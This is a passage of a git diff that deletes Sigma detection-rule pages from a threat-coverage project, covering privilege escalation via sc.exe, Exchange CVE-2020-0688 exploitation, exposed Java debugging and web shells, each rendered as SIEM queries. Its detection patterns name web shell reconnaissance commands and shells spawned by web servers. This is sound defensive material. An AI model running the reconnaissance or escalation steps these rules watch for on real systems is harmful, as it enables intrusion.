-grep -P '^(?:.*(?=.*(?:.*(?=.*4673)(?=.*SeLoadDriverPrivilege)(?=.*-)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\Windows\System32\Dism\.exe.*|.*.*\Windows\System32\rundll32\.exe.*|.*.*\Windows\System32\fltMC\.exe.*|.*.*\Windows\HelpPane\.exe.*|.*.*\Windows\System32\mmc\.exe.*|.*.*\Windows\System32\svchost\.exe.*|.*.*\Windows\System32\wimserv\.exe.*|.*.*\procexp64\.exe.*|.*.*\procexp\.exe.*|.*.*\procmon64\.exe.*|.*.*\procmon\.exe.*|.*.*\Google\Chrome\Application\chrome\.exe.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_using_sc_to_change_sevice_image_path_by_non_admin.md b/Atomic_Threat_Coverage/Detection_Rules/win_using_sc_to_change_sevice_image_path_by_non_admin.md
deleted file mode 100644
index 281961d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_using_sc_to_change_sevice_image_path_by_non_admin.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Possible Privilege Escalation via Weak Service Permissions       |
-|:-------------------------|:------------------|
-| **Description**          | Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1134: Access Token Manipulation](https://attack.mitre.org/techniques/T1134)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li><li>[https://pentestlab.blog/2017/03/30/weak-service-permissions/](https://pentestlab.blog/2017/03/30/weak-service-permissions/)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Privilege Escalation via Weak Service Permissions
-id: d937b75f-a665-4480-88a5-2f20e9f9b22a
-description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-references:
-    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
-    - https://pentestlab.blog/2017/03/30/weak-service-permissions/
-tags:
-    - attack.privilege_escalation
-    - attack.t1134
-status: experimental
-author: Teymur Kheirkhabarov
-date: 2019/10/26
-modified: 2019/11/11
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    scbynonadmin:
-        Image|endswith: '\sc.exe'
-        IntegrityLevel: 'Medium'
-    binpath:
-        CommandLine|contains|all:
-            - 'config'
-            - 'binPath'
-    failurecommand:
-        CommandLine|contains|all: 
-            - 'failure'
-            - 'command'
-    condition: scbynonadmin and (binpath or failurecommand)
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\sc.exe" -and $_.message -match "IntegrityLevel.*Medium" -and ($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*config.*" -and $_.message -match "CommandLine.*.*binPath.*") -or ($_.message -match "CommandLine.*.*failure.*" -and $_.message -match "CommandLine.*.*command.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\sc.exe AND IntegrityLevel:"Medium") AND ((winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binPath*) OR (winlog.event_data.CommandLine.keyword:*failure* AND winlog.event_data.CommandLine.keyword:*command*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d937b75f-a665-4480-88a5-2f20e9f9b22a <<EOF
-{
-  "metadata": {
-    "title": "Possible Privilege Escalation via Weak Service Permissions",
-    "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1134"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\sc.exe AND IntegrityLevel:\"Medium\") AND ((winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binPath*) OR (winlog.event_data.CommandLine.keyword:*failure* AND winlog.event_data.CommandLine.keyword:*command*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\sc.exe AND IntegrityLevel:\"Medium\") AND ((winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binPath*) OR (winlog.event_data.CommandLine.keyword:*failure* AND winlog.event_data.CommandLine.keyword:*command*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Privilege Escalation via Weak Service Permissions'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\sc.exe AND IntegrityLevel:"Medium") AND ((CommandLine.keyword:*config* AND CommandLine.keyword:*binPath*) OR (CommandLine.keyword:*failure* AND CommandLine.keyword:*command*)))
-```
-
-
-### splunk
-    
-```
-((Image="*\\sc.exe" IntegrityLevel="Medium") ((CommandLine="*config*" CommandLine="*binPath*") OR (CommandLine="*failure*" CommandLine="*command*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\sc.exe" IntegrityLevel="Medium" ((CommandLine="*config*" CommandLine="*binPath*") OR (CommandLine="*failure*" CommandLine="*command*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\sc\.exe)(?=.*Medium)))(?=.*(?:.*(?:.*(?:.*(?=.*.*config.*)(?=.*.*binPath.*))|.*(?:.*(?=.*.*failure.*)(?=.*.*command.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_vul_cve_2020_0688.md b/Atomic_Threat_Coverage/Detection_Rules/win_vul_cve_2020_0688.md
deleted file mode 100644
index 2c646d1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_vul_cve_2020_0688.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | CVE-2020-0688 Exploitation via Eventlog       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/](https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CVE-2020-0688 Exploitation via Eventlog
-id: d6266bf5-935e-4661-b477-78772735a7cb
-status: experimental
-description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 
-references:
-    - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
-author: Florian Roth
-date: 2020/02/29
-tags:
-    - attack.initial_access
-    - attack.t1190
-logsource:
-    product: windows
-    service: application
-detection:
-    selection1:
-        EventID: 4
-        Source: MSExchange Control Panel
-        Level: Error
-    selection2:
-        - '*&__VIEWSTATE=*'
-    condition: selection1 and selection2
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Application | where {(($_.ID -eq "4" -and $_.message -match "Source.*MSExchange Control Panel" -and $_.message -match "Level.*Error") -and $_.message -match "*&__VIEWSTATE=*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Application" AND (winlog.event_id:"4" AND winlog.event_data.Source:"MSExchange\ Control\ Panel" AND Level:"Error") AND "*&__VIEWSTATE\=*")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d6266bf5-935e-4661-b477-78772735a7cb <<EOF
-{
-  "metadata": {
-    "title": "CVE-2020-0688 Exploitation via Eventlog",
-    "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688",
-    "tags": [
-      "attack.initial_access",
-      "attack.t1190"
-    ],
-    "query": "(winlog.channel:\"Application\" AND (winlog.event_id:\"4\" AND winlog.event_data.Source:\"MSExchange\\ Control\\ Panel\" AND Level:\"Error\") AND \"*&__VIEWSTATE\\=*\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Application\" AND (winlog.event_id:\"4\" AND winlog.event_data.Source:\"MSExchange\\ Control\\ Panel\" AND Level:\"Error\") AND \"*&__VIEWSTATE\\=*\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CVE-2020-0688 Exploitation via Eventlog'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4" AND Source:"MSExchange Control Panel" AND Level:"Error") AND "*&__VIEWSTATE=*")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Application" (EventCode="4" Source="MSExchange Control Panel" Level="Error") "*&__VIEWSTATE=*")
-```
-
-
-### logpoint
-    
-```
-((event_id="4" Source="MSExchange Control Panel" Level="Error") "*&__VIEWSTATE=*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4)(?=.*MSExchange Control Panel)(?=.*Error)))(?=.*.*&__VIEWSTATE=.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_vul_java_remote_debugging.md b/Atomic_Threat_Coverage/Detection_Rules/win_vul_java_remote_debugging.md
deleted file mode 100644
index 65d1a6d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_vul_java_remote_debugging.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Java Running with Remote Debugging       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a JAVA process running with remote debugging allowing more than just localhost to connect |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1046: Network Service Scanning](https://attack.mitre.org/techniques/T1046)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1046: Network Service Scanning](../Triggers/T1046.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Java Running with Remote Debugging
-id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710
-description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.discovery
-    - attack.t1046
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*transport=dt_socket,address=*'
-    exclusion:
-        - CommandLine: '*address=127.0.0.1*'
-        - CommandLine: '*address=localhost*'
-    condition: selection and not exclusion
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*transport=dt_socket,address=.*" -and  -not ($_.message -match "CommandLine.*.*address=127.0.0.1.*" -or $_.message -match "CommandLine.*.*address=localhost.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*transport\=dt_socket,address\=* AND (NOT (winlog.event_data.CommandLine.keyword:*address\=127.0.0.1* OR winlog.event_data.CommandLine.keyword:*address\=localhost*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 <<EOF
-{
-  "metadata": {
-    "title": "Java Running with Remote Debugging",
-    "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect",
-    "tags": [
-      "attack.discovery",
-      "attack.t1046"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*transport\\=dt_socket,address\\=* AND (NOT (winlog.event_data.CommandLine.keyword:*address\\=127.0.0.1* OR winlog.event_data.CommandLine.keyword:*address\\=localhost*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*transport\\=dt_socket,address\\=* AND (NOT (winlog.event_data.CommandLine.keyword:*address\\=127.0.0.1* OR winlog.event_data.CommandLine.keyword:*address\\=localhost*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Java Running with Remote Debugging'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*transport=dt_socket,address=* AND (NOT (CommandLine.keyword:*address=127.0.0.1* OR CommandLine.keyword:*address=localhost*)))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*transport=dt_socket,address=*" NOT (CommandLine="*address=127.0.0.1*" OR CommandLine="*address=localhost*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*transport=dt_socket,address=*"  -(CommandLine="*address=127.0.0.1*" OR CommandLine="*address=localhost*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*transport=dt_socket,address=.*)(?=.*(?!.*(?:.*(?:.*(?=.*.*address=127\.0\.0\.1.*)|.*(?=.*.*address=localhost.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_webshell_detection.md b/Atomic_Threat_Coverage/Detection_Rules/win_webshell_detection.md
deleted file mode 100644
index e2b9dd5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_webshell_detection.md
+++ /dev/null
@@ -1,192 +0,0 @@
-| Title                    | Webshell Detection With Command Line Keywords       |
-|:-------------------------|:------------------|
-| **Description**          | Detects certain command line parameters often used during reconnaissance activity via web shells |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1505.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Webshell Detection With Command Line Keywords
-id: bed2a484-9348-4143-8a8a-b801c979301c
-description: Detects certain command line parameters often used during reconnaissance activity via web shells
-author: Florian Roth
-reference:
-    - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
-date: 2017/01/01
-modified: 2019/10/26
-tags:
-    - attack.privilege_escalation
-    - attack.persistence
-    - attack.t1100
-    - attack.t1505.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\apache*'
-            - '*\tomcat*'
-            - '*\w3wp.exe'
-            - '*\php-cgi.exe'
-            - '*\nginx.exe'
-            - '*\httpd.exe'
-        CommandLine:
-            - '*whoami*'
-            - '*net user *'
-            - '*ping -n *'
-            - '*systeminfo'
-            - '*&cd&echo*'
-            - '*cd /d*'  # https://www.computerhope.com/cdhlp.htm
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\apache.*" -or $_.message -match "ParentImage.*.*\\tomcat.*" -or $_.message -match "ParentImage.*.*\\w3wp.exe" -or $_.message -match "ParentImage.*.*\\php-cgi.exe" -or $_.message -match "ParentImage.*.*\\nginx.exe" -or $_.message -match "ParentImage.*.*\\httpd.exe") -and ($_.message -match "CommandLine.*.*whoami.*" -or $_.message -match "CommandLine.*.*net user .*" -or $_.message -match "CommandLine.*.*ping -n .*" -or $_.message -match "CommandLine.*.*systeminfo" -or $_.message -match "CommandLine.*.*&cd&echo.*" -or $_.message -match "CommandLine.*.*cd /d.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\apache* OR *\\tomcat* OR *\\w3wp.exe OR *\\php\-cgi.exe OR *\\nginx.exe OR *\\httpd.exe) AND winlog.event_data.CommandLine.keyword:(*whoami* OR *net\ user\ * OR *ping\ \-n\ * OR *systeminfo OR *&cd&echo* OR *cd\ \/d*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bed2a484-9348-4143-8a8a-b801c979301c <<EOF
-{
-  "metadata": {
-    "title": "Webshell Detection With Command Line Keywords",
-    "description": "Detects certain command line parameters often used during reconnaissance activity via web shells",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.persistence",
-      "attack.t1100",
-      "attack.t1505.003"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\apache* OR *\\\\tomcat* OR *\\\\w3wp.exe OR *\\\\php\\-cgi.exe OR *\\\\nginx.exe OR *\\\\httpd.exe) AND winlog.event_data.CommandLine.keyword:(*whoami* OR *net\\ user\\ * OR *ping\\ \\-n\\ * OR *systeminfo OR *&cd&echo* OR *cd\\ \\/d*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\apache* OR *\\\\tomcat* OR *\\\\w3wp.exe OR *\\\\php\\-cgi.exe OR *\\\\nginx.exe OR *\\\\httpd.exe) AND winlog.event_data.CommandLine.keyword:(*whoami* OR *net\\ user\\ * OR *ping\\ \\-n\\ * OR *systeminfo OR *&cd&echo* OR *cd\\ \\/d*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Webshell Detection With Command Line Keywords'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\apache* *\\tomcat* *\\w3wp.exe *\\php\-cgi.exe *\\nginx.exe *\\httpd.exe) AND CommandLine.keyword:(*whoami* *net user * *ping \-n * *systeminfo *&cd&echo* *cd \/d*))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\apache*" OR ParentImage="*\\tomcat*" OR ParentImage="*\\w3wp.exe" OR ParentImage="*\\php-cgi.exe" OR ParentImage="*\\nginx.exe" OR ParentImage="*\\httpd.exe") (CommandLine="*whoami*" OR CommandLine="*net user *" OR CommandLine="*ping -n *" OR CommandLine="*systeminfo" OR CommandLine="*&cd&echo*" OR CommandLine="*cd /d*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\apache*", "*\\tomcat*", "*\\w3wp.exe", "*\\php-cgi.exe", "*\\nginx.exe", "*\\httpd.exe"] CommandLine IN ["*whoami*", "*net user *", "*ping -n *", "*systeminfo", "*&cd&echo*", "*cd /d*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\apache.*|.*.*\tomcat.*|.*.*\w3wp\.exe|.*.*\php-cgi\.exe|.*.*\nginx\.exe|.*.*\httpd\.exe))(?=.*(?:.*.*whoami.*|.*.*net user .*|.*.*ping -n .*|.*.*systeminfo|.*.*&cd&echo.*|.*.*cd /d.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_webshell_spawn.md b/Atomic_Threat_Coverage/Detection_Rules/win_webshell_spawn.md
deleted file mode 100644
index a2ff3af..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_webshell_spawn.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Shells Spawned by Web Servers       |
-|:-------------------------|:------------------|
-| **Description**          | Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Particular web applications may spawn a shell process legitimately</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.t1505.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Shells Spawned by Web Servers
-id: 8202070f-edeb-4d31-a010-a26c72ac5600
-status: experimental
-description: Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack
-author: Thomas Patzke
-date: 2019/01/16
-modified: 2020/03/25
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\w3wp.exe'
-            - '*\httpd.exe'
-            - '*\nginx.exe'
-            - '*\php-cgi.exe'
-            - '*\tomcat.exe'
-        Image:
-            - '*\cmd.exe'
-            - '*\sh.exe'
-            - '*\bash.exe'
-            - '*\powershell.exe'
-            - '*\bitsadmin.exe'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.privilege_escalation
-    - attack.persistence
-    - attack.t1100
-    - attack.t1505.003
-falsepositives:
-    - Particular web applications may spawn a shell process legitimately
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\w3wp.exe" -or $_.message -match "ParentImage.*.*\\httpd.exe" -or $_.message -match "ParentImage.*.*\\nginx.exe" -or $_.message -match "ParentImage.*.*\\php-cgi.exe" -or $_.message -match "ParentImage.*.*\\tomcat.exe") -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\sh.exe" -or $_.message -match "Image.*.*\\bash.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\bitsadmin.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\w3wp.exe OR *\\httpd.exe OR *\\nginx.exe OR *\\php\-cgi.exe OR *\\tomcat.exe) AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\sh.exe OR *\\bash.exe OR *\\powershell.exe OR *\\bitsadmin.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8202070f-edeb-4d31-a010-a26c72ac5600 <<EOF
-{
-  "metadata": {
-    "title": "Shells Spawned by Web Servers",
-    "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.persistence",
-      "attack.t1100",
-      "attack.t1505.003"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
